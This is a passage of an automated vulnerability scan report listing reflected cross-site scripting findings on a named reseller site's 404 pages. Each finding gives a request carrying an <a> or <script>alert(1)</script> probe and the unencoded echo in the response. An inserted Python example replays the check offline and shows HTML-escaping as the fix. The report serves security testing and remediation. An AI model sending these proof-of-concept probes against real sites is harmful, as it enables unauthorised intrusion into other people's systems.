This behaviour demonstrates that new HTML tags can be injected into the returned document. Unlike the Certain findings above, only the harmless <a> probe was reflected for this parameter value; the scanner's attempt to get a full JavaScript proof-of-concept through was not successful. Examine the application's handling of this parameter manually to identify any input validation or other obstacle that may be in place.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search32263<a>1b95818d01a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search32263<a>1b95818d01a&opt=2 was not found on this server.</p>
...[SNIP]...
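
The findings in this section share one mechanism: the requested URL is written back into the 404 page as text between tags. The following Python script is an added example, not part of the XSS.CX report or of the scanned site. It replays the scanner's canary check offline against constructed copies of the recorded 404 bodies, shows how the "REST URL parameter N" and "name of an arbitrarily supplied request parameter" requests are built, and shows the HTML-encoding the error page should have applied. The function names, the 'encoded'/'modified' outcome labels and the sample bodies are the example's own; the scanned host is never contacted.

```python
"""
Added example, not part of the XSS.CX report or of the scanned site: replays
the scanner's reflected-XSS canary check offline against constructed copies
of the 404 responses recorded in this section, shows how the "REST URL
parameter N" and "arbitrarily supplied parameter name" requests are built,
and shows the encoding the error page should have applied.
"""
import html
import re

# Probe tags in the shape the report records: <random prefix><probe><random suffix>.
# The scanner rates a finding "Certain" when the <script> probe comes back
# verbatim and "Firm" when only the harmless <a> probe does.
SCRIPT_PROBE = "<script>alert(1)</script>"
TAG_PROBE = "<a>"


def build_canary(prefix: str, probe: str, suffix: str) -> str:
    """Wrap a probe tag in the random markers used to locate it in the response."""
    return f"{prefix}{probe}{suffix}"


def inject_into_segment(path: str, index: int, canary: str) -> str:
    """Append the canary to the index-th path segment (1-based). This is how the
    report's "REST URL parameter N" requests are formed: /detail/37/rating.php
    has parameters 1="detail", 2="37", 3="rating.php"."""
    segments = path.strip("/").split("/")
    if not 1 <= index <= len(segments):
        raise ValueError(f"{path} has no REST URL parameter {index}")
    segments[index - 1] += canary
    return "/" + "/".join(segments) + ("/" if path.endswith("/") else "")


def add_canary_parameter(url: str, canary: str) -> str:
    """Add a query parameter whose *name* is the canary (the report's
    "name of an arbitrarily supplied request parameter" case)."""
    separator = "&" if "?" in url else "?"
    return f"{url}{separator}{canary}=1"


def classify_reflection(response_body: str, prefix: str, suffix: str) -> str:
    """Decide what the response did with the probe between the two markers:
    'certain'  - <script> probe reflected verbatim (the report's Certain findings)
    'firm'     - only the <a> probe reflected verbatim (the report's Firm findings)
    'encoded'  - reflected, but HTML-encoded, so it stays text (safe in this context)
    'modified' - reflected but altered in some other way
    'none'     - markers not found in the response at all
    """
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), response_body, re.S)
    if match is None:
        return "none"
    echoed = match.group(1)
    if echoed == SCRIPT_PROBE:
        return "certain"
    if echoed == TAG_PROBE:
        return "firm"
    if html.unescape(echoed) in (SCRIPT_PROBE, TAG_PROBE):
        return "encoded"
    return "modified"


def safe_not_found_body(request_uri: str) -> str:
    """The 404 line as it should be emitted: the URI is HTML-encoded before it is
    placed as text between tags, so a reflected probe cannot become markup."""
    return f"<p>The requested URL {html.escape(request_uri, quote=True)} was not found on this server.</p>"


# Constructed sample bodies modelled on the responses recorded in this section.
CERTAIN_BODY = (
    "<p>The requested URL /detail/37275ca<script>alert(1)</script>2b31dc069f3600329"
    "/rating.php?id=37&rating=5 was not found on this server.</p>"
)
FIRM_BODY = (
    "<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search"
    "32263<a>1b95818d01a&opt=2 was not found on this server.</p>"
)


if __name__ == "__main__":
    probe_url = inject_into_segment(
        "/detail/37/rating.php", 2, build_canary("275ca", SCRIPT_PROBE, "2b31dc069f3600329"))
    print("probe request path:", probe_url)
    print("recorded 404 body:", classify_reflection(CERTAIN_BODY, "275ca", "2b31dc069f3600329"))
    print("Submit3 parameter:", classify_reflection(FIRM_BODY, "32263", "1b95818d01a"))
    fixed = safe_not_found_body(probe_url + "?id=37&rating=5")
    print("encoded 404 body:", classify_reflection(fixed, "275ca", "2b31dc069f3600329"))
```

The classifier mirrors the report's confidence levels: a verbatim `<script>` echo is what the Certain findings show, a verbatim `<a>` echo with no script echo is what the Firm findings (Submit3, keyword, opt) show. Running the same check against `safe_not_found_body` demonstrates that encoding the URL before it is placed in the error page turns every finding in this section into an `encoded` result.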

2.2478. http://www.resellerbase.com/detail/37/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5fbd9<a>d9c2d037916 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/search.php?keyword=search...5fbd9<a>d9c2d037916&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...5fbd9<a>d9c2d037916&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2479. http://www.resellerbase.com/detail/37/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20b33<script>alert(1)</script>e87d7922952 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=2&20b33<script>alert(1)</script>e87d7922952=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search&opt=2&20b33<script>alert(1)</script>e87d7922952=1 was not found on this server.</p>
...[SNIP]...

2.2480. http://www.resellerbase.com/detail/37/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 12e9e<a>9f87681a10a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=212e9e<a>9f87681a10a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search&opt=212e9e<a>9f87681a10a was not found on this server.</p>
...[SNIP]...

2.2481. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9e18<script>alert(1)</script>fc8c7b79720 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila9e18<script>alert(1)</script>fc8c7b79720/37/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila9e18<script>alert(1)</script>fc8c7b79720/37/themes/ was not found on this server.</p>
...[SNIP]...

2.2482. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4938<script>alert(1)</script>eebb25e7f60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37f4938<script>alert(1)</script>eebb25e7f60/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37f4938<script>alert(1)</script>eebb25e7f60/themes/ was not found on this server.</p>
...[SNIP]...

2.2483. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af1e9<script>alert(1)</script>adc2e7ce881 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesaf1e9<script>alert(1)</script>adc2e7ce881/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themesaf1e9<script>alert(1)</script>adc2e7ce881/ was not found on this server.</p>
...[SNIP]...

2.2484. http://www.resellerbase.com/detail/37/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1e90<script>alert(1)</script>4db247f8e33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/?c1e90<script>alert(1)</script>4db247f8e33=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/?c1e90<script>alert(1)</script>4db247f8e33=1 was not found on this server.</p>
...[SNIP]...

2.2485. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a88f<script>alert(1)</script>87d2a6d0a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a88f<script>alert(1)</script>87d2a6d0a65/37/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a88f<script>alert(1)</script>87d2a6d0a65/37/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2486. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a64f7<script>alert(1)</script>a4013c0cedb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37a64f7<script>alert(1)</script>a4013c0cedb/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37a64f7<script>alert(1)</script>a4013c0cedb/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2487. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 33043<script>alert(1)</script>21150f9e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes33043<script>alert(1)</script>21150f9e4b7/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes33043<script>alert(1)</script>21150f9e4b7/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2488. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35248<script>alert(1)</script>a6f64945d6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos35248<script>alert(1)</script>a6f64945d6c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos35248<script>alert(1)</script>a6f64945d6c/ was not found on this server.</p>
...[SNIP]...

2.2489. http://www.resellerbase.com/detail/37/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e83a<script>alert(1)</script>b1840cddc49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/?3e83a<script>alert(1)</script>b1840cddc49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/?3e83a<script>alert(1)</script>b1840cddc49=1 was not found on this server.</p>
...[SNIP]...

2.2490. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload febae<script>alert(1)</script>68b3231d958 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfebae<script>alert(1)</script>68b3231d958/37/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfebae<script>alert(1)</script>68b3231d958/37/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2491. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7a2e5<script>alert(1)</script>4bc326ebd5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/377a2e5<script>alert(1)</script>4bc326ebd5c/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/377a2e5<script>alert(1)</script>4bc326ebd5c/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2492. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5226b<script>alert(1)</script>68c98b834c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes5226b<script>alert(1)</script>68c98b834c9/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes5226b<script>alert(1)</script>68c98b834c9/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2493. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0e3d<script>alert(1)</script>2508f589ed5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosb0e3d<script>alert(1)</script>2508f589ed5/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosb0e3d<script>alert(1)</script>2508f589ed5/images/ was not found on this server.</p>
...[SNIP]...

2.2494. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12f9b<script>alert(1)</script>c32db453f50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images12f9b<script>alert(1)</script>c32db453f50/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:06 GMT
